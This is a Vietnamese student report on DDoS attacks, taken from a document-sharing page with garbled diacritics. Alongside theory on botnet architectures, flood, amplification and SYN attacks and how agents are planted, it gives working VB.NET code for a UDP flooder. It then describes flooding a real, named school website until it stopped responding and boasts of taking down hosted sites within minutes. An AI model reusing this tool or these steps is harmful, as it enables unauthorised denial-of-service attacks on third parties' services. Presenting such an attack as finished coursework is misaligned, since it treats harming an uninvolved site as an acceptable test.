Bài tập môn học an toàn thông tin mạng: Tìm hiểu DDOS và mô phỏng công cụ tấn công DDOS

25 60 0
Bài tập môn học an toàn thông tin mạng: Tìm hiểu DDOS và mô phỏng công cụ tấn công DDOS

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

T r ước việc tham gia vào môn học an toàn thông tin mạng, chúng ta cần phải chuẩn bị cho mình một số khái niệm và cũng như một số cách thức hoạt động, cơ chế của các cuộc tấn công cũng như phòng vệ trên mạng nhằm đảm bảo sao cho hệ thống máy của mình có thể tồn tại và vận hành tốt sau các cuộc tấn công đó. Không bằng cách nào khác để phòng vệ là chúng ta phải học cách tấn công để tìm ra các lỗ hỗng còn tồn tại trong hệ thống nhằm khắc phục và đưa ra các bản vá lỗi cho hệ thống.

TRƯỜNG ĐẠI HỌC BÁCH KHOA KHOA CÔNG NGHỆ THÔNG TIN B MễN MNG V TRUYN THễNG Ô BI TẬP MƠN HỌC: AN TỒN THƠNG TIN MẠNG TÌM HIỂU DDOS VÀ MÔ PHỎNG CÔNG CỤ TẤN CÔNG DDOS Sinh viên : Nguyễn Văn Cường Phạm Hùng Duy Lớp : 06T2 Nhóm : 7A Cán hướng dẫn : Th.S Nguyễn Tấn Khôi Đà Nẵng 2010 Bộ môn Mạng Truyền Thông MỤC LỤC CHƯƠNG CƠ SỞ LÝ THUYẾT 1.1 DDOS: 1.1.1 Tổng quan: 1.1.2 Kiến trúc tổng quan DDoS attack-network: 1.1.2.1 Mơ hình Agent – Handler: 1.1.2.2 Mơ hình IRC – Based: 1.1.3 Một số dạng công DDoS: 1.1.3.1 Kiểu công làm cạn kiệt băng thông mạng (BandWith Depletion Attack): 1.1.3.2 Kiểu công làm cạn kiệt tài nguyên: (Resource Deleption Attack) 1.1.4 Một số đặc tính cơng cụ DdoS attack: 1.1.4.1 Cách thức cài đặt DDoS Agent: 1.1.4.2 Giao tiếp Attack-Network: 1.1.4.3 Các tảng hỗ trợ Agent: 1.1.4.4 Các chức công cụ DDoS: CHƯƠNG THIẾT KẾ VÀ XÂY DỰNG ỨNG DỤNG 6 6 9 12 14 14 16 16 17 18 2.1 Phân tích yêu cầu: 2.1.1 Yêu cầu đặt ra: 2.1.2 Hướng giải quyết: 18 18 18 2.2 Xây dựng ứng dụng: 2.2.1 Các thành phần cần thiết cho chương trình: 2.2.2 Mã lệnh: 18 18 19 CHƯƠNG TRIỂN KHAI VÀ ĐÁNH GIÁ KẾT QUẢ 3.1 Môi trường triển khai: 3.2 Thử nghiệm ứng dụng: 3.2.1 Các bước tiến hành: 3.2.2 Chụp ảnh demo: Nguyễn Văn Cường – Phạm Hùng Duy 21 21 21 21 21 DDOS công cụ công DDOS TỔNG QUAN VỀ ĐỀ TÀI Bối cảnh lý thực đề tài: Trước việc tham gia vào mơn học an tồn thơng tin mạng, cần phải chuẩn bị cho số khái niệm số cách thức hoạt động, chế công phòng vệ mạng nhằm đảm bảo cho hệ thống máy tồn vận hành tốt sau cơng Khơng cách khác để phòng vệ phải học cách cơng để tìm lỗ hỗng tồn hệ thống nhằm khắc phục đưa vá lỗi cho hệ thống Phương pháp triển khai đề tài Tài liệu giới thiệu nét DDoS (đặc biệt UDP FLOODER DDOS) Kết cấu báo cáo Phần sở lý thuyết: • Giới thiệu DDoS • Nêu tổng quan VisualBasic Phần triển khai: Nguyễn Văn Cường – Phạm Hùng Duy Bộ môn Mạng Truyền Thông Chương CƠ SỞ LÝ THUYẾT 1.1 DDOS: 1.1.1 Tổng quan: 1.1.2 Kiến trúc tổng quan DDoS attack-network: Nhìn chung DDoS attack-network có hai mơ hình chính: + Mơ hình Agent – Handler + Mơ hình IRC – Based Dưới sơ đồ phân loại kiểu cơng DDoS 1.1.2.1.Mơ hình Agent – Handler: Theo mơ hình này, attack-network gồm thành phần: Agent, Client Handler Ỉ Client : software sở để hacker điều khiển hoạt động attacknetwork Æ Handler : thành phần software trung gian Agent Client Ỉ Agent : thành phần software thực công mục tiêu, nhận điều khiển từ Client thông qua Handler Kiến trúc attack-network kiểu Agent – Handler Nguyễn Văn Cường – Phạm Hùng Duy DDOS công cụ công DDOS Attacker từ Client giao tiếp với cc1 Handler để xác định số lượng Agent online, điều chỉnh thời điểm công cập nhật Agent Tùy theo cách attacker cấu hình attack-network, Agent chịu quản lý hay nhiều Handler Thông thường Attacker đặt Handler software Router hay server có lượng traffic lưu thông nhiều Việc nhằm làm cho giao tiếp Client, handler Agent khó bị phát Các gia tiếp thông thường xảy protocol TCP, UDP hay ICMP Chủ nhân thực Agent thông thường không hay biết họ bị lợi dụng vào công kiểu DDoS, họ khơng đủ kiến thức chương trình Backdoor Agent sử dụng tài nguyên hệ thống làm cho khơng thể thấy ảnh hưởng đến hiệu hệ thống 1.1.2.2.Mơ hình IRC – Based: Internet Relay Chat (IRC) hệ thống online chat multiuser, IRC cho phép User tạo kết nối đến multipoint đến nhiều user khác chat thời gian thực Kiến trúc củ IRC network bao gồm nhiều IRC server khắp internet, giao tiếp với nhiều kênh (channel) IRC network cho phép user tạo ba loại channel: public, private serect • Public channel: Cho phép user channel thấy IRC name nhận message user khác channel Nguyễn Văn Cường – Phạm Hùng Duy Bộ môn Mạng Truyền Thơng • • Private channel: thiết kế để giao tiếp với đối tượng cho phép Không cho phép user không channel thấy IRC name message channel Tuy nhiên, user channel dùng số lệnh channel locator biết tồn private channel Secrect channel : tương tự private channel xác định channel locator Kiến trúc attack-network kiểu IRC-Base IRC – Based net work tương tự Agent – Handler network mơ hình sử dụng kênh giao tiếp IRC làm phương tiện giao tiếp Client Agent (khơng sử dụng Handler) Sử dụng mơ hình này, attacker cịn có thêm số lợi khác như: + Các giao tiếp dạng chat message làm cho việc phát chúng vơ khó khăn + IRC traffic di chuyển mạng với số lượng lớn mà không bị nghi ngờ + Không cần phải trì danh sách Agent, hacker cần logon vào IRC server nhận report trạng thái Agent channel gửi + Sau cùng: IRC môi trường file sharing tạo điều kiện phát tán Agent code lên nhiều máy khác Nguyễn Văn Cường – Phạm Hùng Duy DDOS công cụ công DDOS 1.1.3 Một số dạng công DDoS: 1.1.3.1.Kiểu công làm cạn kiệt băng thông mạng (BandWith Depletion Attack): BandWith Depletion Attack thiết kế nhằm làm tràng ngập mạng mục tiêu với traffic không cần thiết, với mục địch làm giảm tối thiểu khả traffic hợp lệ đến hệ thống cung cấp dịch vụ mục tiêu Có hai loại BandWith Depletion Attack: + Flood attack: Điều khiển Agent gởi lượng lớn traffic đến hệ thống dịch vụ mục tiêu, làm dịch vụ bị hết khả băng thông + Amplification attack: Điều khiển agent hay Client tự gửi message đến địa IP broadcast, làm cho tất máy subnet gửi message đến hệ thống dịch vụ mục tiêu Phương pháp làm gia tăng traffic không cần thiết, làm suy giảm băng thơng mục tiêu • Flood attack: Nguyễn Văn Cường – Phạm Hùng Duy 10 Bộ môn Mạng Truyền Thông Trong phương pháp này, Agent gửi lượng lớn IP traffic làm hệ thống dịch vụ mục tiêu bị chậm lại, hệ thống bị treo hay đạt đến trạng thái hoạt động bão hòa Làm cho User thực hệ thống không sử dụng dịch vụ Ta chia Flood Attack thành hai loại: + UDP Flood Attack: tính chất connectionless UDP, hệ thống nhận UDP message đơn giản nhận vào tất packet cần phải xử lý Một lượng lớn UDP packet gởi đến hệ thống dịch vụ mục tiêu đẩy toàn hệ thống đến ngưỡng tới hạn + Các UDP packet gửi đến nhiều port tùy ý hay port Thông thường gửi đến nhiều port làm cho hệ thống mục tiêu phải căng để xử lý phân hướng cho packet Nếu port bị công không sẵn sàng hệ thống mục tiêu gửi ICMP packet loại “destination port unreachable” Thông thường Agent software dùng địa IP giả để che giấu hành tung, message trả port xử lý dẫn đến đại Ip khác UDP Flood attack làm ảnh hưởng đến kết nối xung quanh mục tiêu hội tụ packet diễn mạnh + ICMP Flood Attack: thiết kế nhằm mục đích quản lý mạng định vị thiết bị mạng Khi Agent gởi lượng lớn ICMP_ECHO_REPLY đến hệ thống mục tiêu hệ thống phải reply lượng tương ứng Packet để trả lời, dẫn đến nghẽn đường truyền Tương tự trường hợp trên, địa IP cá Agent bị giả mạo • Amplification Attack: Amplification Attack nhắm đến việc sử dụng chức hỗ trợ địa IP broadcast router nhằm khuyếch đại hồi chuyển công Chức cho phép bên gửi định địa IP broadcast cho tồn subnet bên nhận thay nhiều địa Router có nhiệm vụ gửi đến tất địa IP subnet packet broadcast mà nhận Nguyễn Văn Cường – Phạm Hùng Duy DDOS cơng cụ cơng DDOS Attacker gửi broadcast message trực tiếp hay thông qua số Agent nhằm làm gia tăng cường độ cơng Nếu attacker trực tiếp gửi message, lợi dụng hệ thống bên broadcast network Agent Amplifier Network System Có thể chia amplification attack thành hai loại, Smuft va Fraggle attack: + Smuft attack: kiểu công attacker gởi packet đến network amplifier (router hay thiết bị mạng khác hỗ trợ broadcast), với địa nạn nhân Thông thường packet dùng ICMP ECHO REQUEST, packet yêu cầu yêu cầu bên nhận phải trả lời ICMP ECHO REPLY packet Network amplifier gửi đến ICMP ECHO REQUEST packet đến tất hệ thống thuộc địa broadcast tất hệ thống REPLY packet địa IP mục tiêu công Smuft Attack + Fraggle Attack: tương tự Smuft attack thay dùng ICMP ECHO REQUEST packet dùng UDP ECHO packet gởi đếm mục tiêu Thật biến thể khác Fraggle attack gửi đến UDP ECHO packet đến Nguyễn Văn Cường – Phạm Hùng Duy 12 Bộ môn Mạng Truyền Thông chargen port (port 19/UNIX) mục tiêu, với địa bên gửi echo port (port 7/UNIX) mục tiêu, tạo nên vịng lặp vơ hạn Attacker phát động công ECHO REQUEST với địa bên nhận địa broadcast, toàn hệ thống thuộc địa gửi REPLY đến port echo nạn nhân, sau từ nạn nhân ECHO REPLY lại gửi trở địa broadcast, q trình tiếp diễn Đây nguyên nhân Flaggle Attack nguy hiểm Smuft Attack nhiều 1.1.3.2.Kiểu công làm cạn kiệt tài nguyên: (Resource Deleption Attack) Theo định nghĩa: Resource Deleption Attack kiểu cơng Attacker gởi packet dùng protocol sai chức thiết kế, hay gửi packet với dụng ý làm tắt nghẽn tài nguyên mạng làm cho tài nguyên không phục vụ user thơng thường khác • Protocol Exploit Attack: + TCP SYS Attack: Transfer Control Protocol hỗ trợ truyền nhận với độ tin cậy cao nên sử dụng phương thức bắt tay bên gởi bên nhận trước truyền liệu Bước đầu tiên, bên gửi gởi SYN REQUEST packet (Synchronize) Bên nhận nhận SYN REQUEST trả lời SYN/ACK REPLY packet Bước cuối cùng, bên gửi truyên packet cuối ACK bắt đầu truyền liệu SYS TCP Client Client Port 1024-65535 TCP Server SYN/ ACK ACK Service Port 1-1023 Nếu bên server trả lời yêu cầu SYN SYN/ACK REPLY không nhận ACK packet cuối sau khoảng thời gian quy định resend lại SYN/ACK REPLY hết thời gian timeout Toàn tài nguyên hệ thống “dự trữ” để xử lý phiên giao tiếp nhận ACK packet cuối bị “phong tỏa” hết thời gian timeout Nguyễn Văn Cường – Phạm Hùng Duy DDOS công cụ công DDOS Maliciou s TCP Client SYS packet with a deliberately fraudulent (spoofed) source IP return address SYN Victim TCP Server ? SYS/ ACK Nắm điểm yếu này, attacker gởi SYN packet đến nạn nhân với địa bên gởi giả mạo, kết nạn nhân gởi SYN/ACK REPLY đến địa không nhận ACK packet cuối cùng, hết thời gian timeout nạn nhân nhận điều giải phóng tài nguyên hệ thống Tuy nhiên, lượng SYN packet giả mạo đến với số lượng nhiều dồn dập, hệ thống nạn nhân bị hết tài nguyên + PUSH = ACK Attack: Trong TCP protocol, packet chứa buffer, buffer đầy packet chuyển đến nơi cần thiết Tuy nhiên, bên gởi yêu cầu hệ thống unload buffer trước buffer đầy cách gởi packet với PUSH ACK mang giá trị Những packet làm cho hệ thống nạn nhân unload tất liệu TCP buffer gửi ACK packet trở thực xong điều này, trình diễn liên tục với nhiều Agent, hệ thống xử lý lượng lớn packet gửi đến bị treo • Malformed Packet Attack: Malformed Packet Attack cách công dùng Agent để gởi packet có cấu trúc khơng chuẩn nhằm làm cho hệ thống nạn nhân bị treo Có hai loại Malformed Packet Attack: Nguyễn Văn Cường – Phạm Hùng Duy 14 Bộ môn Mạng Truyền Thông + IP address attack: dùng packet có địa gởi nhận giống làm cho hệ điều hành nạn nhân không xử lý bị treo + IP packet options attack ngẫu nhiên hóa vùng OPTION IP packet thiết lập tất bit QoS lên 1, điều làm cho hệ thống nạn nhân phải tốn thời gian phân tích, sử dụng số lượng lớn Agent làm hệ thống nạn nhân hết khả xử lý 1.1.4 Một số đặc tính cơng cụ DdoS attack: Có nhiều điểm chung mặt software cơng cụ DDoS attack Có thể kể số điểm chung như: cách cài Agent software, phương pháp giao tiếp attacker, handler Agent, điểm chung loại hệ điều hành hỗ trợ công cụ Sơ đồ mô tả so sánh tương quan công cụ công DDoS 1.1.4.1.Cách thức cài đặt DDoS Agent: Attacker dùng phương pháp active passive để cài đặt agent software lên máy khác nhằm thiết lập attack-network kiểu Agent-Handler hay IRC-based - Cách cài đặt Active: Nguyễn Văn Cường – Phạm Hùng Duy n DDOS công cụ công DDOS + Scaning: dùng công cụ Nmap, Nessus để tìm sơ hở hệ thống online nhằm cài đặt Agentsoftware Chú ý, Nmap trả thông tin hệ thống định địa IP, Nessus tìm kiếm từ địa IP điểm yếu biết trước + Backdoor: sau tìm thấy danh sách hệ thống lợi dụng, attacker tiến hành xâm nhập cài Agentsoftware lên hệ thống Có nhiều thơng tin sẵn có cách thức xâm nhập mạng, site tổ chức Common Vulnerabilities and Exposures (CVE), liệt kê phân loại 4.000 loại lỗi tất hệ thống có Thơng tin sẵn sàng cho giới quản trị mạng lẫn hacker + Trojan: chương trình thực chức thơng thường đó, lại có số chức tiềm ẩn phục vụ cho mục đích riêng người viết mà người dùng khơng thể biết Có thể dùng trojan Agent software + buffer Overflow: tận dụng lỗi buffer overflow, attacker làm cho chu trình thực thi chương trình thơng thường bị chuyển sang chu trình thực thi chương trình hacker (nằm vùng liệu ghi đè) Có thể dùng cách để cơng vào chương trình có điểm yếu buffer overflow để chạy chương trình Agent software - Cách cài đặt passive: + Bug Website: attacker lợi dụng số lỗi web brower để cài Agent software vào máy user truy cập Attaker tạo website mang nội dung tiềm ẩn code lệnh để đặt bẫy user Khi user truy cập nội dung website, website download cài đặt Agent software cách bí mật Microsoft Internet Explorer web browser thường mục tiêu cách cài đặt này, với lỗi ActiveX cho phép IE brower tự động download cài đặt code máy user duyệt web + Corrupted file: phương pháp khác nhúng code vào file thông thường Khi user đọc hay thực thi file này, máy họ bị nhiễm Agent software Một kỹ thuật phổ biến đặt tên file dài, default Nguyễn Văn Cường – Phạm Hùng Duy 16 Bộ môn Mạng Truyền Thông hệ điều hành hiển thị phần đầu tên file nên attacker gửi kèm theo email cho nạn nhân file sau: iloveyou.txt_hiiiiiii_NO_this_is_DDoS.exe, thấy phần “Iloveyou.txt” hiển thị nên user mở file để đọc file thực thi Agent code cài vào máy nạn nhân Ngồi cịn nhiều cách khác ngụy trang file, ghép file… - Rootkit: chương trình dùng để xóa dấu vết diện Agent hay Handler máy nạn nhân Rootkit thường dùng Hander software cài, đóng vai trị xung yếu cho hoạt động attack-network hay môi trường mà khả bị phát Handler cao Rootkit dùng Agent mức độ quan trọng Agent không cao có số Agent khơng ảnh hưởng nhiều đến attack-network 1.1.4.2.Giao tiếp Attack-Network: - Protocol: giao tiếp attack-network thực protocol TCP, UDP, ICMP - Mã hóa giao tiếp: vài công cụ DDoS hỗ trợ mã hóa giao tiếp tồn attack-network Tùy theo protocol sử dụng để giao tiếp có phương pháp mã hóa thích hợp Nếu attack-network dạng IRC-based private secrect channel hỗ trợ mã hóa giao tiếp - Cách kích hoạt Agent: có hai phương pháp chủ yếu để kích hoạt Agent Cách thứ Agent thường xuyên quét thăm dó Handler hay IRC channel để nhận thị (active Agent) Cách thứ hai Agent đơn giản “nằm vùng” chờ thị từ Handler hay IRC Channel 1.1.4.3.Các tảng hỗ trợ Agent: Cá công cụ DDoS thông thường thiết kế hoạt động tương thích với nhiều hệ điều hành khác như: Unix, Linux, Solaris hay Windows Các thành phần attack-network vận hành môi trường hệ điều hành khác Nguyễn Văn Cường – Phạm Hùng Duy DDOS công cụ công DDOS Thông thường Handler vận hành hệ chạy server lớn Unix, Linux hay Solaris Agent thông thường chạy hệ điều hành phổ biến windows cần số lượng lớn dễ khai thác 1.1.4.4.Các chức công cụ DDoS: Mỗi công cụ DDoS có tập lệnh riêng, tập lệnh Handler Agent thực Tuy nhiên ta phân loại tổng quát tập lệnh chung công cụ sau: Lệnh Log On Turn On Log Off Turn Off Initiate Attack List Agents Kiss Agents Add victim Download Upgrades Set Spoofing Set Attack Time Set Attack Duration BufferSize Help TẬP LỆNH CỦA HANDLER Mô tả Nhằm dùng để logon vào Handler software (user + password) Kích hoạt Handler sẵn sàng nhận lệnh Nhằm dùng để Logoff khỏi Handler software Chỉ dẫn Handler ngưng hoạt động, Handler quét tìm Agent dừng hành vi Ra lệnh cho Handler hướng dẫn Agent trực thuộc công mục tiêu định Yên cầu Handler liệt kê Agent trực thuộc Loại bỏ Agent khỏi hàng ngũ Attack-Network Thêm mục tiêu để công Cập nhật cho Handler software (downloads file.exe thực thi) Kích hoạt thiết lập chế giả mạo địa IP cho Agent Định thời điểm công cho Agent Thông báo độ dài công vào mục tiêu Thiết lập kích thước buffer Agent (nhằm gia tăng sức mạnh cho Agent) Hướng dẫn sử dụng chương trình TẬP LỆNH AGENT Turn On Kich hoat Agent sẵn sàng nhận lệnh Turn Off Chỉ dẫn Agent ngưng hoạt động, Agent quét tìm Handler/IRC Channel dừng hành vi lại Initiate Attacke Ra lệnh Agent công mục tiêu định Download Cập nhật cho Agent software (downloaf file exe thực thi) Upgrades Set Spoofing Thiết lập chế giả mạo địa IP cho Agent hoạt động Set Attack Thông báo độ dài công vào mục tiêu Duration Set Packet Size Thiết lập kích thước attack packet Help Hướng dẫn sử dụng chương trình Nguyễn Văn Cường – Phạm Hùng Duy 18 Bộ môn Mạng Truyền Thông Chương THIẾT KẾ VÀ XÂY DỰNG ỨNG DỤNG 2.1.Phân tích yêu cầu: 2.1.1 Yêu cầu đặt ra: Xây dựng chương trình UDP FLOOD đơn giản với yêu cầu sau: - Thể chất công DDoS - Tấn công thành công webside hệ thống mạng 2.1.2 Hướng giải quyết: Cách cơng UDP địi hỏi phải có hệ thống máy tham gia Hackers làm cho hệ thống vào vịng lặp trao đổi liệu qua giao thức UDP Và giả mạo địa ip gói tin địa loopback ( 127.0.0.1 ) , gởi gói tin đến hệ thống nạn nhân cổng UDP echo ( ) Hệ thống nạn nhân trả lời lại messages 127.0.0.1( ) gởi đến , kết vịng vịng lặp vơ tận Tuy nhiên, có nhiều hệ thống không cho dùng địa loopback nên hacker giả mạo địa ip máy tính mạng nạn nhân tiến hành ngập lụt UDP hệ thống nạn nhân 2.2.Xây dựng ứng dụng: 2.2.1 Các thành phần cần thiết cho chương trình: - Label1 Ip - TextField1 Ip: người dùng nhập địa máy đích vào - Label2 Port - TextField Port: cổng mà chương trình gửi liệu đến cho máy đích - Label3 Status - Label4 dùng thơng báo trạng thái chương trình, Active hay Stop - Listbox1: hiển thị luông liệu chạy chương trình Nguyễn Văn Cường – Phạm Hùng Duy DDOS công cụ công DDOS - Button1 Start: bắt đầu gửi UDP packet cho máy đich - Button2 Stop: dừng việc gửi UDP packet cho máy đích - Button3 Cancel: xóa TextField, Listbox để bắt đầu phiên làm việc 2.2.2 Mã lệnh: Me.components = New System.ComponentModel.Container Me.Label1 = New System.Windows.Forms.Label Me.Label2 = New System.Windows.Forms.Label Me.TextBox1 = New System.Windows.Forms.TextBox Me.TextBox2 = New System.Windows.Forms.TextBox Me.Label3 = New System.Windows.Forms.Label Me.Label4 = New System.Windows.Forms.Label Me.ListBox1 = New System.Windows.Forms.ListBox Me.Button1 = New System.Windows.Forms.Button Me.Button2 = New System.Windows.Forms.Button Me.Button3 = New System.Windows.Forms.Button Me.Timer1 = New System.Windows.Forms.Timer(Me.components) // - Xu ly chuong trinh chinh -// Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick Try ListBox1.Items.Add("UDP FLOODER ->S#" + TextBox1.Text + "#S") ListBox1.Items.Add(My.Computer.Info.AvailableVirtualMemory) Dim udpClient As New UdpClient Dim GLOIP As IPAddress Dim bytCommand As Byte() = New Byte() {} GLOIP = IPAddress.Parse(TextBox1.Text) udpClient.Connect(GLOIP, TextBox2.Text) bytCommand = Encoding.ASCII.GetBytes("b970b1dcdba8b16c22fa1ab5e3d41091b970 b1dcdba8b16c22fa1ab5e3d41091b970b1dcdba8b16c 22fa1ab5e3d41091b970b1dcdba8b16c22fa1ab5e3d41091b970b1dcdba 8b16c22fa1ab5e3d41091b970b1dcdba8b16c22fa1ab5e3d41091") udpClient.Send(bytCommand, bytCommand.Length) ListBox1.SelectedIndex += Catch ex As Exception Me.Close() End Try End Sub Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click label2.forecolor = Color.Lime label2.text = "Active!" Nguyễn Văn Cường – Phạm Hùng Duy 20 Bộ môn Mạng Truyền Thông Timer1.Start() End Sub Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click label2.forecolor = Color.Red label2.text = "Stopped!" Timer1.Stop() End Sub Private Sub Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button3.Click ListBox1.Items.Clear() End Sub Nguyễn Văn Cường – Phạm Hùng Duy DDOS công cụ công DDOS Chương TRIỂN KHAI VÀ ĐÁNH GIÁ KẾT QUẢ 3.1.Môi trường triển khai: - Windown Utimate - MicroSoft Visual Studio 2005 - Webside mục tiêu: http://thpt-nguyentrungtruc.net/Others/Home/Home.aspx - Thời gian thực hiện: server tải băng thông 3.2.Thử nghiệm ứng dụng: 3.2.1 Các bước tiến hành: - Mở ứng dụng: - Dùng công cụ Raynz_Port_Scanner để xác định cổng mở host đích: - Nhấn button start để bắt đầu gửi hàng loạt gói tin UDP đến máy đích: - Đợi máy đích có dấu hiệu khơng đáp ứng REQUEST thơng thường ngừng: - Chương trình chạy thành cơng: Nguyễn Văn Cường – Phạm Hùng Duy 22 Bộ môn Mạng Truyền Thông 3.2.2 Chụp ảnh demo: - Mở ứng dụng - Dùng công cụ Raynz_Port_Scanner để xác định cổng mở host đích Nguyễn Văn Cường – Phạm Hùng Duy DDOS công cụ công DDOS - Nhấn button start để bắt đầu gửi hàng loạt gói tin UDP đến máy đích - Đợi máy đích có dấu hiệu khơng đáp ứng REQUEST thơng thường ngừng Nguyễn Văn Cường – Phạm Hùng Duy 24 Nguyễn Văn Cường – Phạm Hùng Duy Bộ môn Mạng Truyền Thông DDOS cơng cụ cơng DDOS - Chương trình chạy thành công Nguyễn Văn Cường – Phạm Hùng Duy 26 Bộ môn Mạng Truyền Thông KẾT LUẬN VÀ HƯỚNG PHÁT TRIỂN Những kết đạt + Tìm hiểu chi tiết, tổng quan khía cạnh tảng công nghệ DDOS chất khái niệm, thách thức yêu cầu, ứng dụng, mô hình kiến trúc, chuẩn + Xây dựng ứng dụng demo cho công cụ DDOS tảng UDP FLOOD + Cơng cụ mạnh, lam sập webside dung host FREE vòng phút Những vấn đề tồn + Chương trình cần hoàn thiện + Đây demo nhỏ minh họa cho chế UDP Flood + Cần có chương trình trung gian thứ để tìm cổng mở máy đích Hướng phát triển + Xây dựng quét cổng mở cho ứng dụng + Thiết kế cho ứng dụng công mạnh mẽ + Thiết kế để cơng Server lớn Nguyễn Văn Cường – Phạm Hùng Duy DDOS công cụ công DDOS TÀI LIỆU THAM KHẢO [1] Luận văn DDOS [2] Hacker toàn tập [3] Các công vào hệ thong mạng [4] DOS, DDOS – nỗi ám ảnh nhà quản trị mạng Nguyễn Văn Cường – Phạm Hùng Duy ... Nguyễn Văn Cường – Phạm Hùng Duy DDOS công cụ công DDOS 1.1.3 Một số dạng công DDoS: 1.1.3.1.Kiểu công làm cạn kiệt băng thông mạng (BandWith Depletion Attack): BandWith Depletion Attack thiết... dễ khai thác 1.1.4.4.Các chức công cụ DDoS: Mỗi cơng cụ DDoS có tập lệnh riêng, tập lệnh Handler Agent thực Tuy nhiên ta phân loại tổng quát tập lệnh chung công cụ sau: Lệnh Log On Turn On Log... phương pháp giao tiếp attacker, handler Agent, điểm chung loại hệ điều hành hỗ trợ công cụ Sơ đồ mô tả so sánh tương quan công cụ công DDoS 1.1.4.1.Cách thức cài đặt DDoS Agent: Attacker dùng phương

Ngày đăng: 04/08/2020, 21:40

Hình ảnh liên quan

Nhìn chung DDoS attack-network có hai mô hình chính: + Mô hình Agent – Handler  - Bài tập môn học an toàn thông tin mạng: Tìm hiểu DDOS và mô phỏng công cụ tấn công DDOS

h.

ìn chung DDoS attack-network có hai mô hình chính: + Mô hình Agent – Handler Xem tại trang 4 của tài liệu.
1.1.2.2.Mô hình IRC – Based: - Bài tập môn học an toàn thông tin mạng: Tìm hiểu DDOS và mô phỏng công cụ tấn công DDOS

1.1.2.2..

Mô hình IRC – Based: Xem tại trang 5 của tài liệu.

Từ khóa liên quan

Tài liệu cùng người dùng

  • Đang cập nhật ...

Tài liệu liên quan